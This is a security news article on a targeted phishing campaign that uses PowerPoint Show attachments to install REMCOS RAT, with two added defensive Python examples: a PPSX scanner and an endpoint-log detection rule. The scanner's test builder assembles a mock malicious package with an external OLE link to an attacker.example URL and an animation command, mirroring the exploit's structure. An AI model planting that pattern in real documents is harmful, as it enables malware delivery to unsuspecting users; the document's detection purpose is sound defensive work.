Just when you thought you were safe, it seems cyber criminals are taking advantage of a vulnerability in Microsoft PowerPoint’s Object Linking and Embedding (OLE) interface. Cyber criminals have been using the OLE exploit to install malware on the devices of unsuspecting victims, and by using this approach their malware evades antivirus software. The exploit was first identified by Trend Micro, who quickly reported it to the world. Apparently the attack is similar to the one used by the DRIDEX banking Trojan that impacted the world earlier this year. Trend Micro notes that this is also the first time they’ve seen PowerPoint used as an attack vector. This cyber attack does not just exploit PowerPoint but the negligent insider as well.
Method and Impact
Photo Credit: Trend Micro
By now you likely know that many malicious campaigns begin with a phishing email. In this case it is not a dragnet phishing campaign but a very targeted one, intended to trick insiders into following the attacker’s instructions. The exploit comes in the form of an email attachment made specifically for the electronics manufacturing industry. The email itself is disguised to appear as if it came from a cable manufacturing business partner; which one depends on the insider targeted and on the information available to the attacker who crafted it. The email specifically mentions an RFQ and specifications for a large order. The intent of the email is to get you to click the attachment out of suspicion about that large order.
The email looks like this:
Photo Credit: Trend Micro
When a user does click the email attachment, which is a PPSX file, there will be no RFQ or even any list of items. Instead they will be greeted with just the line “CVE-2017-8570”, which was the name of another vulnerability in Microsoft Office. Opening the file triggers a remote download of a malicious payload by way of PowerPoint Show animations. Once the payload is executed in its entirety, it downloads a file called “logo.doc”, an XML file that acts as a command to download and execute an executable called “RATMAN.EXE”. This is in reality a remote access tool, and a legitimate one at that, so it would not raise any red flags. The tool is actually REMCOS RAT, a very powerful tool that allows a system to be controlled by another user anywhere in the world. Included in the tool is the ability to log keystrokes, take screenshots, record a user via webcam or microphone, and a few other commands.
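The attachment described above is an Office Open XML package, so the pieces the attack depends on (a relationship pointing outside the package and an animation-time command) are plain XML inside a ZIP and can be found before anyone opens the file. The following is an added example of a triage check, not Trend Micro’s tooling or anything from the original article; the two sample packages are constructed inline, and the URL in the suspicious one is a placeholder, not a real indicator.

```python
"""Triage helper for PowerPoint Show (.ppsx) attachments.

A .ppsx file is an Office Open XML package, a ZIP archive of XML parts.
Links to content outside the package live in its relationship (.rels) parts,
and animation-time actions live in the slide XML.  scan_ppsx() flags both
features so an analyst or mail gateway can hold the attachment for review.
Added example, not Trend Micro's tooling; the sample packages are built
inline and the URL in them is constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
PML_NS = "http://schemas.openxmlformats.org/presentationml/2006/main"
# Target schemes that mean the package refers to something fetched or run
# outside itself (script: is the URL moniker Office resolves via scripting).
RISKY_SCHEME = re.compile(r"^(https?|ftp|file|script|mhtml):", re.IGNORECASE)


def scan_ppsx(data: bytes) -> list:
    """Return (part_name, reason) findings; an empty list means nothing flagged."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if not (name.endswith(".rels") or name.endswith(".xml")):
                continue  # binary parts (images, embedded objects) are not parsed here
            root = ET.fromstring(pkg.read(name))
            if name.endswith(".rels"):
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    target = rel.get("Target", "")
                    if rel.get("TargetMode") == "External" or RISKY_SCHEME.match(target):
                        findings.append((name, f"external relationship -> {target}"))
            elif name.startswith("ppt/slides/"):
                # p:cmd is an animation behaviour that invokes a command (an OLE
                # verb, for instance) when the timeline reaches it, with no click.
                for cmd in root.iter(f"{{{PML_NS}}}cmd"):
                    findings.append((name, f"animation command type={cmd.get('type')} cmd={cmd.get('cmd')}"))
    return findings


def build_sample_package(malicious: bool) -> bytes:
    """Construct a minimal .ppsx-like package.  The malicious variant carries an
    external relationship plus an animation command, mimicking the pattern
    described in the text (the URL is a placeholder, not a real indicator)."""
    slide_rels = [
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
    ]
    timing = ""
    if malicious:
        slide_rels.append(
            '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
            'Target="http://attacker.example/logo.doc" TargetMode="External"/>'
        )
        timing = ('<p:timing><p:tnLst><p:par><p:cTn><p:childTnLst>'
                  '<p:cmd type="verb" cmd="3"><p:cBhvr><p:cTn/><p:tgtEl><p:spTgt spid="4"/></p:tgtEl></p:cBhvr></p:cmd>'
                  '</p:childTnLst></p:cTn></p:par></p:tnLst></p:timing>')
    parts = {
        "[Content_Types].xml": '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "_rels/.rels": (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" '
                        'Target="ppt/presentation.xml"/></Relationships>'),
        "ppt/slides/slide1.xml": f'<p:sld xmlns:p="{PML_NS}"><p:cSld><p:spTree/></p:cSld>{timing}</p:sld>',
        "ppt/slides/_rels/slide1.xml.rels": f'<Relationships xmlns="{REL_NS}">{"".join(slide_rels)}</Relationships>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        for name, xml in parts.items():
            pkg.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    for label, flag in (("benign", False), ("suspicious", True)):
        hits = scan_ppsx(build_sample_package(flag))
        print(f"{label}: {len(hits)} finding(s)")
        for part, reason in hits:
            print(f"  {part}: {reason}")
```

On the constructed packages the benign one produces no findings and the suspicious one produces two: the external relationship in the slide’s .rels part and the animation command in the slide XML. Either finding on its own is enough to hold a PPSX attachment for review; a legitimate quote or specification deck rarely needs to reach outside the package.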
Because PPSX (PowerPoint Slideshow) files are not a common attack vector, as of right now the attack is invisible to antivirus suites. What can help prevent this attack is the use of solutions that have an emphasis on insider threats. One of the core things to do is monitor and block downloads from unknown email addresses. Additionally, if you are monitoring activity logs on your server and on its endpoints as well, you should be able to detect outgoing activity from within your network. With an insider threat solution you could also set up automated rules that log users off if malicious activity triggers a rule violation you have established. Lastly, keep up to date with any patches you are notified of.
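The monitoring advice above can be turned into concrete rules: an Office process connecting to a host the business does not normally exchange documents with, and an Office process launching a new executable, with the two correlated on the same endpoint within a short window. The following is an added example of that detection logic, not from the original article or from Trend Micro; it runs over a handful of constructed endpoint log lines whose hosts, user names, paths and timestamps are made up, and the key=value log format is an assumption rather than any particular product’s schema.

```python
"""Detection logic for the post-exploitation behaviour described above:
an Office process reaching out to an unlisted host, and an Office process
spawning a new executable.  Runs over constructed endpoint log lines (hosts,
users, paths and timestamps are made up); the log format is an assumption,
not a particular product's schema.  Added example, not from the article.
"""
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE_IMAGES = {"POWERPNT.EXE", "WINWORD.EXE", "EXCEL.EXE", "OUTLOOK.EXE"}
# Destinations the business already exchanges documents with (constructed).
KNOWN_PARTNER_HOSTS = {"sharepoint.corp.example", "mail.corp.example"}

# Constructed sample log: one infected workstation and one normal one.
SAMPLE_LOG = r"""
2017-08-14T09:12:03Z host=WS-0117 user=jdoe event=process_create image=C:\Office\POWERPNT.EXE parent=C:\Office\OUTLOOK.EXE
2017-08-14T09:12:09Z host=WS-0117 user=jdoe event=network_connect image=C:\Office\POWERPNT.EXE dest=unknown-host.example:80
2017-08-14T09:12:11Z host=WS-0117 user=jdoe event=process_create image=C:\Users\jdoe\AppData\Local\Temp\RATMAN.EXE parent=C:\Office\POWERPNT.EXE
2017-08-14T09:15:40Z host=WS-0204 user=asmith event=network_connect image=C:\Office\POWERPNT.EXE dest=sharepoint.corp.example:443
2017-08-14T09:16:02Z host=WS-0204 user=asmith event=process_create image=C:\Office\EXCEL.EXE parent=C:\Windows\explorer.exe
"""


def parse_line(line: str) -> dict:
    """Split 'timestamp k=v k=v ...' into a record with a datetime 'ts' field."""
    ts, *pairs = line.split()
    rec = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")}
    for token in pairs:
        key, _, value = token.partition("=")
        rec[key] = value
    return rec


def basename(path: str) -> str:
    """Upper-cased file name of a Windows path, for comparison against OFFICE_IMAGES."""
    return path.rsplit("\\", 1)[-1].upper()


def detect(log_text: str, window: timedelta = timedelta(seconds=60)) -> list:
    """Return (host, severity, description) alerts in log order."""
    alerts = []
    office_egress = defaultdict(list)  # host -> timestamps of flagged Office egress
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        image = basename(rec.get("image", ""))
        if rec["event"] == "network_connect" and image in OFFICE_IMAGES:
            dest_host = rec["dest"].rsplit(":", 1)[0]
            if dest_host not in KNOWN_PARTNER_HOSTS:
                alerts.append((rec["host"], "medium", f"{image} connected to unlisted host {dest_host}"))
                office_egress[rec["host"]].append(rec["ts"])
        elif rec["event"] == "process_create":
            parent = basename(rec.get("parent", ""))
            if parent in OFFICE_IMAGES and image not in OFFICE_IMAGES:
                severity = "medium"
                # Escalate when the same host showed Office egress to an unlisted
                # host moments earlier: download followed by execution.
                if any(timedelta(0) <= rec["ts"] - t <= window for t in office_egress[rec["host"]]):
                    severity = "high"
                alerts.append((rec["host"], severity, f"{parent} spawned {image} from {rec['image']}"))
    return alerts


if __name__ == "__main__":
    for host, severity, description in detect(SAMPLE_LOG):
        print(f"[{severity}] {host}: {description}")
```

On the constructed log this yields two alerts for WS-0117 and none for WS-0204: a medium alert for PowerPoint reaching an unlisted host, then a high alert two seconds later when PowerPoint launches an executable out of the user’s temp directory. The high-severity condition is the one worth wiring to an automated response such as the forced log-off the text mentions; the medium one on its own is better routed to review, since Office processes do legitimately contact partner sites.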
This PowerPoint vulnerability gives hackers a very dangerous and stealthy way of infecting user devices that can go undetected by many organizations. This one also relies heavily on negligent insiders. Just because this attack is specifically targeted at the electronics manufacturing industry doesn’t mean it can’t be reapplied to other industries or to the average user.